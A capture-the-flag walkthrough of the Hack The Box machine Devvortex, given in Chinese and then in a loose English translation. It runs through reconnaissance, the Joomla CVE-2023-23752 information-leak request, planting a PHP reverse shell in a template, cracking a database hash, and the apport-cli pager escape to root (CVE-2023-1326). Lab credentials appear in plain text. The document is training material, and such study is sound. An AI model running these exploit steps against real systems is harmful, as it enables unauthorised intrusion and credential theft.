htb devvortex
Information Gathering
# Nmap 7.98 scan initiated Sat Dec 27 09:08:15 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.242
Nmap scan report for 10.10.11.242
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 15.115 days (since Fri Dec 12 06:22:47 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 09:08:31 2025 -- 1 IP address (1 host up) scanned in 15.48 secondsVulnerability Analysis
由于页面都是静态的所以寻找虚拟机
➜ Devvortex ffuf -u http://devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -H 'Host: FUZZ.devvortex.htb' -t 100 -fs 154
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 351ms]打开dev.devvortex.htb,发现也是静态,寻找一下子目录
➜ Devvortex ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://dev.devvortex.htb/FUZZ -ic
images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
home [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 722ms]
media [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
templates [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
modules [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 363ms]
plugins [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 624ms]
includes [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 364ms]
language [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 341ms]
components [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 344ms]
api [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 420ms]
cache [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 412ms]
libraries [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 526ms]
tmp [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 416ms]
layouts [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 481ms]
administrator [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]http://dev.devvortex.htb/administrator/得到Joomla Administrator Login,查找到一个漏洞CVE-2023-23752
在GitHub中找到Version目录https://github.com/joomla/joomla-cms/blob/5.4-dev/administrator/manifests/files/joomla.xml
http://dev.devvortex.htb/administrator/manifests/files/joomla.xml得到4.2.6可以使用[CVE-2023-23752](https://www.exploit-db.com/exploits/51334)
Exploitation (User Flag)
➜ Devvortex curl http://dev.devvortex.htb/api/index.php/v1/config/application\?public\=true -vv | jq得到凭据lewis:P4ntherg0t1n5r3c0n##
我们在System > Site Templates > Cassiopeia Details and Files > error.php添加php反向shell
ss -tlpn->3306,33060得知mysql
www-data@devvortex:~/dev.devvortex.htb$ less configuration.php
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'lewis';
public $password = 'P4ntherg0t1n5r3c0n##';mysql -u lewis -p登录数据库
枚举数据库得到
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
破解hash值得到凭据logan:tequieromucho
Privilege Escalation (Root Flag)
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11搜索得到CVE-2023-1326
logan@devvortex:~$ sudo /usr/bin/apport-cli -f
# 输入2
# 输入1或随机
# 输入V
# 输入!/bin/bash
即可得到rootLessons Learned
htb devvortex
Information Gathering
# Nmap 7.98 scan initiated on Saturday, December 27, 2025, at 09:08:15, as follows:
# /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.242
Nmap scan report for 10.10.11.242:
The host is up (latency: 0.12 seconds).
998 closed TCP ports were not displayed (they were reset).
PORT STATE SERVICE VERSION
22/tcp open ssh 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
| Supported methods: GET, HEAD, POST, OPTIONS
| http-server-header: nginx/1.18.0 (Ubuntu)
| http-title: Did not follow redirect to http://devvortex.htb/
Device type: General purpose
Operating system: Linux 4.X|5.X
OS Common Platform Enumeration (CPE): cpe:/o:linux:linux_kernel:4, cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 – 5.19
Uptime estimate: 15.115 days (since Friday, December 12, 2025, 06:22:47)
Network distance: 2 hops
TCP sequence prediction difficulty: 265 (Difficult!)
IP ID sequence generation: All zeros
Service information: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Data files were read from: /usr/share/nmap
OS and service detection completed. Please report any incorrect results at: https://nmap.org/submit/.
# Nmap completed on Saturday, December 27, 2025, at 09:08:31 – 1 IP address (1 host up) scanned in 15.48 seconds.Vulnerability Analysis
Since all pages are static, we need to find a virtual machine to perform further analysis.
➜ Devvortex ffuf -u http://devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -H 'Host: FUZZ.devvortex.htb' -t 100 -fs 154
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 351ms]We open dev.devvortex.htb and find that it is also static. Next, we use ffuf to list the available directories:
➜ Devvortex ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://dev.devvortex.htb/FUZZ -ic
images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
home [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 722ms]
media [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
templates [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
modules [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 363ms]
plugins [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 624ms]
includes [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 364ms]
language [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 341ms]
components [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 344ms]
api [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 420ms]
cache [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 412ms]
libraries [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 526ms]
tmp [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 416ms]
layouts [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 481ms]
administrator [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]The path http://dev.devvortex.htb/administrator/ leads to the Joomla administrator login page. We have identified a vulnerability CVE-2023-23752 here.
The Version directory can be found on GitHub at the following link:
https://github.com/joomla/joomla-cms/blob/5.4-dev/administrator/manifests/files/joomla.xml
The joomla.xml file from http://dev.devvortex.htb/administrator/manifests/files/joomla.xml (version 4.2.6) is affected by the vulnerability CVE-2023-23752.
Exploitation (User Flag):
➜ Devvortex curl http://dev.devvortex.htb/api/index.php/v1/config/application\?public\=true -vv | jqWe obtained the credentials: lewis:P4ntherg0t1n5r3c0n##.
We added a PHP reverse shell in System > Site Templates > Cassiopeia Details and Files > error.php.
By using ss -tlpn on port 3306, we identified that the database used is MySQL.
www-data@devvortex:~/dev.devvortex.htb$ less configuration.php
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'lewis';
public $password = 'P4ntherg0t1n5r3c0n##';We logged into the database using mysql -u lewis -p.
By enumerating the database users, we found the username logan and the corresponding password:
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |We cracked the password hash to obtain the actual credentials: logan:tequieromucho.
Privilege Escalation (Root Flag):
logan@devvortex:~$ sudo -lWe found the following default settings for the user logan on devvortex:
env_resetmail_badpasssecure_pathis set to multiple directories including/usr/local/sbin,/usr/local/bin, etc.
The user logan can execute the following commands on devvortex with full privileges:
/usr/bin/apport-cli
We verified the version of apport-cli using:
logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11We then searched for relevant vulnerabilities using apport-cli:
logan@devvortex:~$ sudo /usr/bin/apport-cli -fBy entering specific commands (e.g., 2, 1, or V), or even !/bin/bash, we were able to obtain root access.
Lessons Learned:
```bash
# (No specific lessons learned mentioned in the original text.)